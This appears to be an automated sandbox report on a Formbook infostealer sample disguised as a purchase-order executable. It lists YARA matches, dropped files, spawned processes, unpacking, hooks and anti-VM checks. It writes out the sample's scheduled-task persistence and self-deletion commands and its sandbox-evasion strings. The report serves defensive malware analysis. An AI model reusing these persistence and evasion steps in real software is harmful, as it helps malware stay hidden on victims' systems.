            Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@3/3
            Source: C:\Users\user\Desktop\PO_210223.exeFile created: C:\Users\user\AppData\Roaming\kwqifureL.exeJump to behavior
            Source: C:\Users\user\Desktop\PO_210223.exeMutant created: \Sessions\1\BaseNamedObjects\kOfurgeHGWQSiueuJ
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_01
            Source: C:\Users\user\Desktop\PO_210223.exeFile created: C:\Users\user\AppData\Local\Temp\tmp33D2.tmpJump to behavior
            Source: PO_210223.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO_210223.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\PO_210223.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO_210223.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: PO_210223.exeVirustotal: Detection: 31%
            Source: PO_210223.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\PO_210223.exeFile read: C:\Users\user\Desktop\PO_210223.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO_210223.exe 'C:\Users\user\Desktop\PO_210223.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO_210223.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
            Source: C:\Users\user\Desktop\PO_210223.exeProcess created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'
            Source: C:\Users\user\Desktop\PO_210223.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\PO_210223.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: PO_210223.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO_210223.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: ipconfig.pdb source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_210223.exe, 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, ipconfig.exe, 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: PO_210223.exe, ipconfig.exe
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\PO_210223.exeUnpacked PE file: 0.2.PO_210223.exe.890000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\PO_210223.exeUnpacked PE file: 0.2.PO_210223.exe.890000.0.unpack
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_0089423E push ebp; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_00893835 push cs; iretd
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_00894043 push edi; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_00897272 push edx; iretd
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01286A7C push edi; iretd
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01286A72 push edi; iretd
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00409BAC push ebx; retf
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0041DD1B push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0041CEF2 push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0041CEFB push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0041CEA5 push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0041CF5C push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00C320F3 pushad ; retf
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00C34043 push edi; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00C33835 push cs; iretd
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00C37272 push edx; iretd
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00C3423E push ebp; ret
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00C32E51 push CDBD7B17h; retf
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0185D0D1 push ecx; ret
            Source: C:\Windows\explorer.exeCode function: 10_2_04E13831 push cs; iretd
            Source: C:\Windows\explorer.exeCode function: 10_2_04E113E6 pushad ; ret
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034AD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009CD83B pushad ; ret
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009B9BAC push ebx; retf
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009CDE8E push eax; ret
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009CCEA5 push eax; ret
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009CCEFB push eax; ret
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009CCEF2 push eax; ret
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009CCF5C push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.247286296
            Source: initial sampleStatic PE information: section name: .text entropy: 7.247286296

            Persistence and Installation Behavior:

            barindex
            Uses ipconfig to lookup or modify the Windows network settingsShow sources
            Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
            Source: C:\Users\user\Desktop\PO_210223.exeFile created: C:\Users\user\AppData\Roaming\kwqifureL.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE6
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PO_210223.exe PID: 6976, type: MEMORY
            Source: Yara matchFile source: 0.2.PO_210223.exe.2cb671c.1.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\PO_210223.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\PO_210223.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000009B98E4 second address: 00000000009B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000009B9B4E second address: 00000000009B9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\PO_210223.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00409A80 rdtsc
            Source: C:\Users\user\Desktop\PO_210223.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PO_210223.exe TID: 6980Thread sleep time: -99516s >= -30000s
            Source: C:\Users\user\Desktop\PO_210223.exe TID: 4632Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6496Thread sleep time: -58000s >= -30000s
            Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6736Thread sleep time: -50000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 0000000A.00000000.688633268.0000000004710000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 0000000A.00000000.695692855.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 0000000A.00000000.691690260.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.695692855.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 0000000A.00000000.700408324.000000000FD5B000.00000004.00000001.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.688633268.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\PO_210223.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\PO_210223.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00409A80 rdtsc
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0040ACC0 LdrLoadDll,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018361A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018361A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018869A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018941E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01824120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01824120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01824120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01824120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01824120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01883884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01883884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]
